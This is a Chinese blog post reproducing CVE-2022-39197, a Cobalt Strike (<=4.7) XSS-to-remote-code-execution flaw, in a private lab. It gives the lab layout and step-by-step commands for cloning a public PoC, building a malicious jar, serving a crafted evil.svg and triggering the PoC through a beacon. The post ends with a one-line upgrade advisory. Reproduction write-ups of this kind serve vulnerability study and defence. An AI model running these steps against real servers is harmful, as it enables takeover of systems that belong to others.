CVE-2022-39197(Cobalt Strike XSS <=4.7)漏洞复现(超详细)

已于 2023-05-18 15:48:52 修改
阅读量2.2k 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: xss linux java
于 2023-05-17 19:21:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/130731647
版权

0x00 漏洞概述

  2022年09月22日,360CERT监测发现了Cobalt Strike远程代码执行漏洞,漏洞编号为CVE-2022-39197,漏洞等级:严重,漏洞评分:9.8
  Cobalt Strike(也称CS)由美国Red Team开发,是一款基于java的内网渗透测试工具,是最早的公共红队指挥和控制框架之一。Cobalt Strike旨在通过模拟几种可能的攻击工具和场景,允许渗透测试人员和网络防御人员检查他们的安全专业的强度。然而,安全测试套件也被黑客(包括勒索软件团伙)广泛使用,以渗透目标网络。

0x01 漏洞详情

CVE-2022-39197: Cobalt Strike 远程代码执行漏洞
CVE: CVE-2022-39197

组件: Cobalt Strike

漏洞类型: 代码执行

影响: 服务器接管

简述: 该漏洞存在于Cobalt Strike的Beacon软件中,可能允许攻击者通过在Beacon配置中设置假用户名,触发XSS,进而在 CS Server上造成远程代码执行。

0x02 影响版本

Cobalt Strike <= 4.7

0x03 漏洞复现

复现环境说明

192.168.1.4 Cobalt Strike服务器(kali)
192.168.1.1 Python http服务器 放置远程加载 payload (EvilJar-1.0-jar-with-dependencies.jar和 evil.svg)
192.168.1.6 受害机器(Win7 反过来说他也是攻击机器 CVE-2022-39197.py)

CVE-2022-39197 RCE POC
目录文件介绍

│  cve-2022-39197.py  # POC	
│  README.md
│  requirements.txt		# python依赖
│
├─EvilJar
│  │  pom.xml			#依赖
│  │
│  ├─META-INF
│  │      MANIFEST.MF
│  │
│  └─src
│      └─main
│          └─java
│                  Exploit.java		#执行的命令
│
├─images
│      1.jpg
│
└─serve
        evil.svg								# 远程加载恶意文件
        EvilJar-1.0-jar-with-dependencies.jar	# 生成的jar包

3.1 启动 Cobalt Strike 本次复现版本为 4.3

./teamserver 192.168.1.4 123456
./start.sh

3.2 创建一个Listen 和 Windows Executable

在这里插入图片描述

在这里插入图片描述

3.3 下载 POC 编译 EvilJar-1.0-jar-with-dependencies.jar

git clone https://github.com/its-arun/CVE-2022-39197/

# mvn编译
mvn compile
mvn package

将 EvilJar-1.0-jar-with-dependencies.jar 移动到 serve/ 目录下
在serve目录下创建一个简易的http服务

python3 -m http.server 8000

在这里插入图片描述
修改 evil.svg
链接为简易http主机IP
简易http主机IP

3.4 执行POC 触发XSS

WIn7上线
python cve-2022-39197.py beacon.exe http://192.168.1.1:8000/evil.svg

查看进程列表触发 XSS 执行命令

在这里插入图片描述
在这里插入图片描述

0x04 修复建议

通用修补建议
根据影响版本中的信息,排查并升级到安全版本。

半只特立独行的猪
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CobaltStrike反制上线测试
qq_69775412的博客
10-05 2146
CobaltStrike反制上线测试
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
cobaltstrike4.7安装教程
最新发布
m0_75047805的博客
06-21 269
cobaltstrike搭建
CVE-2022-39197 POC(CobaltStrike XSS =4.7)漏洞复现
qq_35664104的博客
09-23 2605
CobaltStrike
Cobalt Strike RCE漏洞浅析
热门推荐
m0_49443776的博客
12-04 62万+
本次我们要讲的是前段时间传的比较火的Cobalt Strike RCE漏洞分析...
Cobalt Strike 远程代码执行漏洞安全风险通告
smellycat000的专栏
09-22 698
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到 Cobalt Strike 远程代码执行漏洞 ,当攻击者可访问 Beacon 的监听器时,可以在连接Beacon的listener时使用错误的用户名,触发XSS,造成远程代码执行。鉴于这些漏洞影响范围极大,建议客户尽快做好自查及防护。漏洞名称Cobalt Strike 远程代码执行漏洞 公开...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为客户端和服务端,服务端只有一个,大家可以共同操作shell
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
最新CS RCE(CVE-2022-39197复现心得分享
C20220511的博客
10-18 2612
这个漏洞号称是脚本小子杀手,喜欢用CS的朋友们瑟瑟发抖。复现这个漏洞也是一个很有意思的事情,让我学到了很多关于Swing和SVG的知识,这篇文章也希望能帮助大家对此类漏洞的调试、复现等过程有更深入的理解。
漏洞预警】Cobalt Strike team服务被爆RCE漏洞,尽快升级最新版
SAKAISON的博客
09-29 2151
安全客点评:前段时间Metasploit刚爆出反序列化漏洞导致可远程非授权执行代码(http://bobao.360.cn/learning/detail/3047.html),今天又爆出Cobalt Strike team服务RCE漏洞,看来安全人员在使用这些优秀的开源工具进行渗透测试的时候,也要时刻小心那双无形的手。 概要     昨日,Cobalt S
Cobalt Strike =4.7 xss复现和NTLM V2窃取(没有RCE)
crowsec
09-24 3801
CVE-2022-39197这个xss的rce,我只复现xss和简单版本的NTLM哈希窃取。。。 从前几天开始,网上开始讨论关于cobalt strikeCVE-2022-39197漏洞,据说该漏洞可以直接接管服务端的权限。
CS服务器下载漏洞
FreeXploiT
01-25 3416
我是真的觉得这个东西可以利用来入侵的 因为官方的补丁吧dll exe com vbs这些文件全部都禁止下载了要是只是防止密码文件cfg泄漏 何必要禁止这些呢 CS主机远程控制方法与被恶意控制的对策作者:火旗枪剑 来源:枪旗工作室(tcno.net) 日期:2005-5-21 半条命cs的服务器,即一般俗称的主机,带有遥控功能。管理员凭密码控制服务器,甚至不需要进入游戏。本文以主要以coun
cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)
XXokok的博客
12-11 1733
cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)
反制cobalt_strike_4.7
XXokok的博客
12-12 117
反制cobalt_strike_4.7
CVE-2022-47412复现
07-28
很抱歉,但我无法提供关于CVE-2022-47412的信息。 #### 引用[.reference_title] - *1* *2* *3* [Windows CVE-2022-21907和CVE-2022-21970复现以及分析](https://blog.csdn.net/Lab0431/article/details/122942736)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值